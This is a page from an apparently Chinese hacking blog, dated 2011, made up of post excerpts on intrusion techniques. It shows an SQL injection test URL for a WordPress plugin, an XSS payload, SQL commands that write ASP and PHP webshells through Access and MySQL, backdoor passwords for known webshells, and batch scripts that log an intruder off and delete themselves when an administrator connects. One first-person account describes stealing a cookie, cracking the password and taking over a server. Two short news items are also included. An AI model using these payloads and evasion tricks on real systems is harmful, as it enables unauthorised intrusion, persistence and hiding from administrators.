WordPress插件MM Duplicate

分类:安全 | 2011-08-23 | 撸过 568 次
0人扯谈

标题: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability
作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm www.badguest.cn)
下载地址: http://downloads.wordpress.org/plugin/mm-duplicate.zip
测试版本: 1.2 (已测)
 
---
测试方法
---

http://www.badguest.cn/index.php?duplicate=1&post=-1 A[......]

继续阅读

WordPress的3.2.1核心模块post-template.php XSS漏洞及修复

分类:安全 | 2011-08-23 | 撸过 488 次
0人扯谈

Author : Darshit Ashara
Date   : 21/08/2011
Vendor : WordPress
Version: 3.2.1
WordPress核心模块不正确的代码(post-template.php)
导致跨站点脚本。
笔者可以简单地更新
view plaincopy to clipboardprint?
</a><script>alert('1');</script><a>  
</a><script>alert('1');</script><a>
都会给给索引页和[......]

继续阅读

access导出webshell

分类:安全 | 2011-08-23 | 撸过 502 次
0人扯谈

create table cmd(shell text)
insert into cmd (shell) values('<%execute request(1)%>')
SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd

 

利比亚.ly域名注册网站被黑

分类:新闻 | 2011-08-23 | 撸过 473 次
0人扯谈

利比亚.ly域名注册网站被黑

但是黑客并没有控制数据库注册表。。

只是黑了首页,其他页面还是完好的,只是有限的攻入了web服务器!

分页可浏览!http://www.nic.ly/whois.php

官方地址:http://www.nic.ly/

载图留念:

 

 

感谢︶ε╰  憧憬²º¹¹ 投稿!

80后黑客专攻私服广告日赚数十万

分类:新闻 | 2011-08-22 | 撸过 748 次
0人扯谈

群仅有初中、高中文化,自称“骑士”的80后在

传奇私服业内有着响当当的名号。他们日收入数十万,开着玛莎拉蒂、宾利等豪车,

住别墅,投资上千万的写字楼……他们的钱从何而来?

今日上午,重庆市公安局网络安全监察总队透露,被称为“骑士攻击小组”

的19名成员已被警方捉获,他们通过“黑客”技术攻击传奇游戏私服网站,垄断

网站广告代理,从而提取高额广告代理费,涉案金额超过7000万元。

黑客”攻击网站垄断广告代理

经营传奇游戏的私服商们可能都听说过“骑士”,用他们的话说,只要被“骑士”

盯上,那就只有乖乖交出广告代理权,任他们“宰割”。因此,业内人士都称他们为

“骑士攻击小组”。
据[......]

继续阅读

误入网络管理机房

分类:安全 | 2011-08-22 | 撸过 727 次
0人扯谈

外的收获:
最近跨站传得火热,追随潮流,初研跨站攻击,意外地得到某人才招聘网留言板管理员cookie,cookie中有MD5加密后的密码,在http://www.cmd5.com成功解密。运气真是好到了家,利用域名+该密码成功地进入了FTP,上传大写,就这样忽悠到了webshell。服务器中serv-u默认密码虽改,但安装目录有更改权限,简单添加FTP管理员,顺利得到服务器FTP管理员权限,在网站留板中留言:

那知第二天留言被删,漏洞依在,如此重要的人才招聘网站居然没人理会,便引起了我的好奇之心,想到服务器看看究竟。

探测WEB服务器:
   有了FTP管理员权限轻松拿下了服务器权限图中aa[......]

继续阅读

Mysql root导shell

分类:安全 | 2011-08-22 | 撸过 591 次
1人扯谈

Select '' into outfile 'E:/wwwroot/china/eval.php';//导shell,访问报错,详情不解select load_file('E:/wwwroot/china/eval.php');//读shell,检查shell完整性http://www.xxxxxxx.cn/eval.php

经过asc码格式导成功了。连接密码,cmd
select concat(char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),ch[......]

继续阅读

常见的黑客们的后门密码

分类:安全 | 2011-08-22 | 撸过 840 次
2人扯谈

  r00ts小组 密码:r00ts

  组超强功能修正去后门加强S-U提权版 密码hkk007

  火狐asp木马(超强版)” 华夏五周年庆典版 密码wrsk

  **(中国数据) 密码rinima

  asp 黑客→kissy 密码ceshi2009

  Evil sadness 密码5201314

  F.S.T 联盟交流群内部版.!别外传噢 密码rfkl

  username 密码847381979

  这是一个没有信仰的年代-.- 密码jing

  伟 密码winner

  沙漠之烟 密码4816535

  去演绎神话吧’ 密码zhack

  Sam,asp大[......]

继续阅读

ASP探测本地端口之MSWINSCK.OCX方案

分类:安全 | 2011-08-22 | 撸过 506 次
0人扯谈

这个方法很鸡肋,需要服务器有编程环境,mswinsck属于VB控件,装了VC或者VS也行,否则是没有注册的。作为一种思路吧。

MSWINSCK.OCX里的方法可以用来主动连接,但是可能由于本人的ASP功底不够吧,始终没有实现使用Connect方法探测任意IP地址的端口,希望有高人能够写出来代码并能共享出来。

测试环境:Windows 2003 企业版 SP2 IIS 6.0

测试代码:

<%
Function CheckLocalPort(intPort)
On Error Resume Next

Set WinSock = Server.CreateO[......]

继续阅读

内网嗅探自我保护用到的批处理

分类:安全 | 2011-08-22 | 撸过 882 次
0人扯谈

检测管理员上线就注销自已:
  @echo off
  :check
  choice /C YN /T 10 /D Y
  quser find "#16" && del xx.bat logoff
  goto check
  #16 每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。
  -------------------------------------------
  下面适应使用拥有管理员权限的其他帐号:
  @echo off
  logoff 1
  del log.bat
 [......]

继续阅读

第 4 页,共 14 页« 最新...23456...10...最旧 »